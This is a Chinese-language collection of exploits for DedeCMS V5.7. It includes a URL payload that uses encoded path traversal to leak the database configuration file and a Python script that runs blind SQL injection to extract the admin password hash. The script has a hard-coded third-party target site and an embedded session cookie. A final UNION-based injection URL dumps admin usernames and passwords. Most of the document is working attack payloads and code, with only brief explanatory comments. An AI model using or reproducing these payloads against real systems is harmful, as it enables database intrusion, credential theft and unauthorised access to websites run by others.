dedecms的漏洞

爆数据库 Dedecms V5.7 SP1:

直接payload一条龙服务哈

/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0

SQL注入 Dedecms V5.7 SP1:

利用前提:member下注册功能开放
利用脚本:

#!/usr/bin/env python
# encoding:utf-8
# Date: 2015/12/25
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import re
import random
import urllib2


def Get_respone(mtype_url, mdata='', method='get'):
    """Send one HTTP request and return the raw response body.

    mtype_url: full URL to request.
    mdata: request body; only sent when method == 'post'.
    method: 'post' sends mdata as the body, anything else is a plain GET.

    Returns the response body as read() returns it (a Python 2 byte str).
    Any exception from the request is printed and turned into SystemExit,
    so callers never see a failed request as a return value.
    """
    # A fixed Cookie header carrying login-session values (PHPSESSID,
    # DedeUserID, DedeLoginTime, ...) is embedded in the source. That is
    # credential material checked into a file, and every request below
    # only works while this exact session is still valid on the server.
    headers = {
        'Cookie': 'PIDDAV253154=2019041022304518294570; FVTDAV253154=636905322478704625; PHPSESSID=thsqq6s84lc9h2sicf0sv6ir91; DedeUserID=9981; DedeUserID__ckMd5=28f81f2935375e34; DedeLoginTime=1555069244; DedeLoginTime__ckMd5=05d1ba08e4f839e5; OrdersId=e6a1UlIFCQQBAVFUAFVbAlEEBFdbWgIEUg4AAwNhGmUFUwdXUgMABwkHMyoGWlo; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1; LVTDAV253154=636906957184017134; VTSDAV253154=4; MSTSDAV253154=0; VPSDAV253154=31; SIDDAV253154=f908f9d9a2844172a8e829fa19997301; LROIDDAV253154=1000'
    }
    try:
        request = urllib2.Request(mtype_url, headers=headers)
        if method == 'post':
            # urlopen with data= switches the request to POST.
            response = urllib2.urlopen(request, data=mdata, timeout=10).read()
        else:
            response = urllib2.urlopen(request, timeout=10).read()
    # Python 2 "except Type, name" syntax; this catches every exception,
    # including the 10 s timeout, and aborts the whole process.
    except Exception, msg:
        print u'[X] 我擦,出错了!', msg
        raise SystemExit()
    else:
        return response


def Create_id():
    """Create a member category so that a category id exists.

    Posts dopost=add with mtypename=hacker&channelid=1 to the module-global
    mtype_url (assigned under __main__, not passed in) and prints whether
    the response contains the success string. Has no return value; the
    user is told to re-run the program afterwards.

    NOTE(review): this leaves a category literally named 'hacker' behind
    in the member area, a persistent and easily spotted artifact.
    """
    print u'\n[!] 分类ID不存在,正在创建!'
    response = Get_respone(mtype_url + '?dopost=add', 'mtypename=hacker&channelid=1', method='post')
    # Success is detected purely by substring match on the page text.
    if '增加分类成功' in response:
        print u'\n[!] 分类创建成功,请重新执行程序!'
    else:
        print u'\n[X] 分类创建失败,请手工创建!'


def Get_id():
    """Return the first category id found on the mtypes page.

    Fetches the module-global mtype_url (assigned under __main__). If the
    page says the member area is disabled, prints a message and exits via
    SystemExit. Otherwise returns the first 'mtypename[<digits>]' capture
    as a string, or falls through and returns None when nothing matches
    (the __main__ block relies on that None).
    """
    response = Get_respone(mtype_url)
    if '系统关闭了会员功能' in response:
        print u'会员中心关闭,漏洞不存在!'
        raise SystemExit()
    else:
        # Not a raw string, but Python 2 keeps unknown escapes such as
        # '\[' and '\d' literally, so the pattern still works as intended.
        type_reg = re.compile('mtypename\[(\d+)\]')
        idlist = type_reg.findall(response)
        if idlist: return idlist[0]


def Get_hash(typeid):
    """Recover 16 characters of the admin password hash by boolean blind SQLi.

    typeid: category id string returned by Get_id(); it is interpolated
    into the injected condition so the query targets that row.

    For each of 16 positions and each of the 62 candidate characters the
    function sends one request whose tmp_name key carries the injected
    condition and a random float marker, then fetches mtype_url again and
    treats the marker's presence in the page as "condition true". Worst
    case that is 16 * 62 * 2 requests to the same member page with
    '_FILES[' in the query string -- a loud, distinctive pattern in access
    logs. Results are only printed, nothing is returned.
    """
    adminhash = ''
    md5_chars = list('abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPLKJHGFDSAZXCVBNM')
    try:
        for i in range(1, 17):
            # Fresh marker per position so a stale hit from the previous
            # position cannot be mistaken for a match.
            flag = random.random()
            for j in md5_chars:
                payload_pre = "?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name]["
                payload_cent = urllib2.quote(
                        "a' and `'`.``.mtypeid or if(ascii (substr((select left(substring(pwd,4),16) from dede_admin limit 1),"
                        + str(i) + ",1))=" + str(ord(j)) + ",1,0) and mtypeid=" + str(typeid) + "#"
                )
                payload_end = "]=" + str(flag) + "&_FILES[mtypename][size]=.xxxx]"
                payload = payload_pre + payload_cent + payload_end
                # The response of the injecting request itself is never
                # inspected; only the follow-up page fetch below decides.
                payload_res = Get_respone(mtype_url + payload)
                # print response
                match_res = Get_respone(mtype_url)
                if str(flag) in match_res:
                    print u'[!] 爷,正在爆破第 [%-2d] 位,字符为: %s' % (i, j)
                    adminhash = adminhash + j
                    break
    except KeyboardInterrupt:
        print u'[!] 爷,按您的吩咐,已成功退出!'
    # The else branch runs only when both loops finish without Ctrl-C.
    else:
        if adminhash == '':
            print u'[X] 爷,杯具了,漏洞不存在!'
        else:
            print u'\n[¤] 爷,爆破完毕!密码为:', adminhash


if __name__ == '__main__':
    # Hard-coded target. This name is a module global that Get_id(),
    # Create_id() and Get_hash() read directly rather than receive as an
    # argument, so the functions only work when run through this block.
    mtype_url = 'http://www.13sr.com/member/mtypes.php'
    typeid = Get_id()
    # Get_id() returns None when no category exists yet; in that case a
    # category is created and the user must re-run the script.
    if typeid is None:
        Create_id()
    else:
        Get_hash(typeid)


远程文件包含漏洞 Dedecms V5.7 SP1:

通杀SQL注入漏洞 DedeCMS V5.7 20140201之前:

payload:http://baidu.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111